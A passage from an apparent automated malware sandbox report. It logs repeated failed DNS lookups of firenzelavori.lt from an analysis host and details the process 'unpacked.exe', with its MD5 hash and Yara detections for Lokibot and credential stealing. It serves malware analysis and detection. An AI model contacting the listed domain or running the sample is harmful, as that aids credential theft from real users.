                        Jun 8, 2021 21:47:36.458527088 CEST192.168.2.48.8.8.80x6de8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:36.563122034 CEST192.168.2.48.8.8.80x466eStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:37.552800894 CEST192.168.2.48.8.8.80x466eStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:38.807032108 CEST192.168.2.48.8.8.80xd63cStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:39.802510023 CEST192.168.2.48.8.8.80xd63cStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:40.864825010 CEST192.168.2.48.8.8.80xd63cStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:40.934251070 CEST192.168.2.48.8.8.80xebf8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:41.927423000 CEST192.168.2.48.8.8.80xebf8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:42.958767891 CEST192.168.2.48.8.8.80xebf8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:43.184807062 CEST192.168.2.48.8.8.80x3cb8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:44.193227053 CEST192.168.2.48.8.8.80x3cb8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:45.193996906 CEST192.168.2.48.8.8.80x3cb8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:45.297132015 CEST192.168.2.48.8.8.80xd6dbStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:46.287997961 CEST192.168.2.48.8.8.80xd6dbStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:47.303075075 CEST192.168.2.48.8.8.80xd6dbStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:47.535079002 CEST192.168.2.48.8.8.80x6347Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:48.522089958 CEST192.168.2.48.8.8.80x6347Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:48.657644987 CEST192.168.2.48.8.8.80x1cdcStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:49.647190094 CEST192.168.2.48.8.8.80x1cdcStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:50.662636995 CEST192.168.2.48.8.8.80x1cdcStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:50.917951107 CEST192.168.2.48.8.8.80x52abStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:51.912719011 CEST192.168.2.48.8.8.80x52abStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:52.959919930 CEST192.168.2.48.8.8.80x52abStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:53.047916889 CEST192.168.2.48.8.8.80x6bb8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:54.037939072 CEST192.168.2.48.8.8.80x6bb8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Jun 8, 2021 21:45:54.031042099 CEST8.8.8.8192.168.2.40xbfeeServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:54.964849949 CEST8.8.8.8192.168.2.40xbfeeServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:55.283318996 CEST8.8.8.8192.168.2.40xbfffServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:56.096419096 CEST8.8.8.8192.168.2.40xbfeeServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:57.297934055 CEST8.8.8.8192.168.2.40xbfffServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:57.530993938 CEST8.8.8.8192.168.2.40xdba7Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:58.656579018 CEST8.8.8.8192.168.2.40xdba7Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:59.748205900 CEST8.8.8.8192.168.2.40xa13aServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:00.751663923 CEST8.8.8.8192.168.2.40xa13aServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:01.754004955 CEST8.8.8.8192.168.2.40xa13aServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:01.954190969 CEST8.8.8.8192.168.2.40xe1e4Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:02.955827951 CEST8.8.8.8192.168.2.40xe1e4Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:03.166112900 CEST8.8.8.8192.168.2.40x2348Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:04.041093111 CEST8.8.8.8192.168.2.40xe1e4Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:05.052217960 CEST8.8.8.8192.168.2.40x2348Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:05.497453928 CEST8.8.8.8192.168.2.40x3944Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:06.495476007 CEST8.8.8.8192.168.2.40x3944Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:07.523649931 CEST8.8.8.8192.168.2.40x3944Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:07.637537956 CEST8.8.8.8192.168.2.40x7d6Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:08.667673111 CEST8.8.8.8192.168.2.40x7d6Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:09.898715973 CEST8.8.8.8192.168.2.40x9c1fServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:10.878359079 CEST8.8.8.8192.168.2.40x9c1fServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:11.909037113 CEST8.8.8.8192.168.2.40x9c1fServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:12.116466045 CEST8.8.8.8192.168.2.40x70edServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:13.111957073 CEST8.8.8.8192.168.2.40x70edServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:14.141757011 CEST8.8.8.8192.168.2.40x70edServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:14.428513050 CEST8.8.8.8192.168.2.40xbbc0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:15.412590027 CEST8.8.8.8192.168.2.40xbbc0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:16.459697962 CEST8.8.8.8192.168.2.40xbbc0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:16.559284925 CEST8.8.8.8192.168.2.40x38f9Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:17.551523924 CEST8.8.8.8192.168.2.40x38f9Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:18.558773994 CEST8.8.8.8192.168.2.40x38f9Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:18.817079067 CEST8.8.8.8192.168.2.40x5abeServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:18.845583916 CEST8.8.8.8192.168.2.40x5abeServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:20.849522114 CEST8.8.8.8192.168.2.40x5abeServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:21.023518085 CEST8.8.8.8192.168.2.40x87d9Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:22.067851067 CEST8.8.8.8192.168.2.40x87d9Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:22.966429949 CEST8.8.8.8192.168.2.40x87d9Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:23.406764984 CEST8.8.8.8192.168.2.40xaa5Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:24.303822994 CEST8.8.8.8192.168.2.40xaa5Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:25.381407022 CEST8.8.8.8192.168.2.40xaa5Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:25.544979095 CEST8.8.8.8192.168.2.40x671cServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:26.549565077 CEST8.8.8.8192.168.2.40x671cServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:27.578676939 CEST8.8.8.8192.168.2.40x671cServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:28.133059978 CEST8.8.8.8192.168.2.40xf9ebServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:29.147697926 CEST8.8.8.8192.168.2.40xf9ebServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:30.159603119 CEST8.8.8.8192.168.2.40xf9ebServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:30.252590895 CEST8.8.8.8192.168.2.40x465bServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:31.391915083 CEST8.8.8.8192.168.2.40x465bServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:32.521692991 CEST8.8.8.8192.168.2.40x6046Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:32.534461021 CEST8.8.8.8192.168.2.40x6046Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:34.568773985 CEST8.8.8.8192.168.2.40x6046Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:34.649571896 CEST8.8.8.8192.168.2.40xe466Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:34.676616907 CEST8.8.8.8192.168.2.40xe466Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:35.903491020 CEST8.8.8.8192.168.2.40x1ca4Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:36.929928064 CEST8.8.8.8192.168.2.40x1ca4Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:38.021327019 CEST8.8.8.8192.168.2.40xb8feServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:39.055157900 CEST8.8.8.8192.168.2.40xb8feServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:40.255594969 CEST8.8.8.8192.168.2.40x4458Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:41.272996902 CEST8.8.8.8192.168.2.40x4458Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:42.322325945 CEST8.8.8.8192.168.2.40x4458Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:42.377063036 CEST8.8.8.8192.168.2.40xfd45Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:43.381939888 CEST8.8.8.8192.168.2.40xfd45Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:44.412440062 CEST8.8.8.8192.168.2.40xfd45Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:45.058058977 CEST8.8.8.8192.168.2.40xdf11Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:46.191679001 CEST8.8.8.8192.168.2.40xdf11Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:47.190107107 CEST8.8.8.8192.168.2.40xe24aServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:48.177098989 CEST8.8.8.8192.168.2.40xe24aServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:49.217385054 CEST8.8.8.8192.168.2.40xe24aServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:49.458240032 CEST8.8.8.8192.168.2.40x967dServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:50.473567009 CEST8.8.8.8192.168.2.40x967dServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:51.460020065 CEST8.8.8.8192.168.2.40x967dServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:51.563159943 CEST8.8.8.8192.168.2.40x498dServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:52.630448103 CEST8.8.8.8192.168.2.40x498dServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:53.799050093 CEST8.8.8.8192.168.2.40xcdd8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:53.833877087 CEST8.8.8.8192.168.2.40xcdd8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:55.848917961 CEST8.8.8.8192.168.2.40xcdd8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:55.906429052 CEST8.8.8.8192.168.2.40x92e4Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:56.895240068 CEST8.8.8.8192.168.2.40x92e4Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:57.927381039 CEST8.8.8.8192.168.2.40x92e4Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:58.141593933 CEST8.8.8.8192.168.2.40xef23Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:59.167232990 CEST8.8.8.8192.168.2.40xef23Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:00.166117907 CEST8.8.8.8192.168.2.40xef23Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:00.375360012 CEST8.8.8.8192.168.2.40x94f1Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:01.303164005 CEST8.8.8.8192.168.2.40x94f1Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:02.311242104 CEST8.8.8.8192.168.2.40x94f1Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:02.639693975 CEST8.8.8.8192.168.2.40xa055Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:03.650212049 CEST8.8.8.8192.168.2.40xa055Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:04.635265112 CEST8.8.8.8192.168.2.40xa055Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:04.753757954 CEST8.8.8.8192.168.2.40xa7f0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:05.742089987 CEST8.8.8.8192.168.2.40xa7f0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:06.741580009 CEST8.8.8.8192.168.2.40xa7f0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:06.995599985 CEST8.8.8.8192.168.2.40xb68eServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:06.999622107 CEST8.8.8.8192.168.2.40xb68eServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:09.006959915 CEST8.8.8.8192.168.2.40xb68eServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:09.118876934 CEST8.8.8.8192.168.2.40x17bServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:10.110972881 CEST8.8.8.8192.168.2.40x17bServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:10.346471071 CEST8.8.8.8192.168.2.40x24d0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:11.101150036 CEST8.8.8.8192.168.2.40x17bServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:12.360198021 CEST8.8.8.8192.168.2.40x24d0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:12.463222027 CEST8.8.8.8192.168.2.40x94d3Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:13.478159904 CEST8.8.8.8192.168.2.40x94d3Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:13.478791952 CEST8.8.8.8192.168.2.40x94d3Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:14.685441971 CEST8.8.8.8192.168.2.40x8f0bServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:15.729770899 CEST8.8.8.8192.168.2.40x8f0bServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:16.714116096 CEST8.8.8.8192.168.2.40x8f0bServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:17.254282951 CEST8.8.8.8192.168.2.40x366aServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:18.536780119 CEST8.8.8.8192.168.2.40x366aServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:20.016000032 CEST8.8.8.8192.168.2.40xd515Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:21.015921116 CEST8.8.8.8192.168.2.40xd515Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:21.054079056 CEST8.8.8.8192.168.2.40xd515Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:22.136045933 CEST8.8.8.8192.168.2.40x6df5Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:23.136607885 CEST8.8.8.8192.168.2.40x6df5Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:24.174911976 CEST8.8.8.8192.168.2.40x6df5Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:24.389036894 CEST8.8.8.8192.168.2.40x5d9fServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:25.384382963 CEST8.8.8.8192.168.2.40x5d9fServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:25.519726038 CEST8.8.8.8192.168.2.40x28c7Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:26.427104950 CEST8.8.8.8192.168.2.40x5d9fServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:27.522811890 CEST8.8.8.8192.168.2.40x28c7Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:27.780371904 CEST8.8.8.8192.168.2.40xb6fcServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:28.824048042 CEST8.8.8.8192.168.2.40xb6fcServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:29.824358940 CEST8.8.8.8192.168.2.40xb6fcServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:29.909408092 CEST8.8.8.8192.168.2.40xf0e0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:30.916280031 CEST8.8.8.8192.168.2.40xf0e0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:32.136877060 CEST8.8.8.8192.168.2.40x11f1Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:33.151773930 CEST8.8.8.8192.168.2.40x11f1Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:34.166973114 CEST8.8.8.8192.168.2.40x11f1Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:34.240186930 CEST8.8.8.8192.168.2.40xd4a0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:35.231642962 CEST8.8.8.8192.168.2.40xd4a0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:36.265803099 CEST8.8.8.8192.168.2.40xd4a0Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:36.501844883 CEST8.8.8.8192.168.2.40x6de8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:37.493937969 CEST8.8.8.8192.168.2.40x6de8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:38.519963026 CEST8.8.8.8192.168.2.40x6de8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:38.613956928 CEST8.8.8.8192.168.2.40x466eServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:39.622416973 CEST8.8.8.8192.168.2.40x466eServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:40.868098021 CEST8.8.8.8192.168.2.40xd63cServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:41.862596035 CEST8.8.8.8192.168.2.40xd63cServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:41.915184021 CEST8.8.8.8192.168.2.40xd63cServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:43.001543045 CEST8.8.8.8192.168.2.40xebf8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:44.070219040 CEST8.8.8.8192.168.2.40xebf8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:45.015480042 CEST8.8.8.8192.168.2.40xebf8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:45.244647980 CEST8.8.8.8192.168.2.40x3cb8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:46.256390095 CEST8.8.8.8192.168.2.40x3cb8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:47.253948927 CEST8.8.8.8192.168.2.40x3cb8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:47.349199057 CEST8.8.8.8192.168.2.40xd6dbServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:48.341305017 CEST8.8.8.8192.168.2.40xd6dbServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:48.602914095 CEST8.8.8.8192.168.2.40x6347Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:49.365561962 CEST8.8.8.8192.168.2.40xd6dbServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:50.575690985 CEST8.8.8.8192.168.2.40x6347Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:50.713604927 CEST8.8.8.8192.168.2.40x1cdcServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:50.718641043 CEST8.8.8.8192.168.2.40x1cdcServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:52.731357098 CEST8.8.8.8192.168.2.40x1cdcServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:52.988394976 CEST8.8.8.8192.168.2.40x52abServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:53.964979887 CEST8.8.8.8192.168.2.40x52abServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:54.010020018 CEST8.8.8.8192.168.2.40x52abServer failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:54.116904020 CEST8.8.8.8192.168.2.40x6bb8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:56.097395897 CEST8.8.8.8192.168.2.40x6bb8Server failure (2)firenzelavori.ltnonenoneA (IP address)IN (0x0001)

                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Start time:21:45:49
                        Start date:08/06/2021
                        Path:C:\Users\user\Desktop\unpacked.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\unpacked.exe'
                        Imagebase:0x400000
                        File size:106496 bytes
                        MD5 hash:1917F888CACD48B9A8D4832449E8D34F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.643480909.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
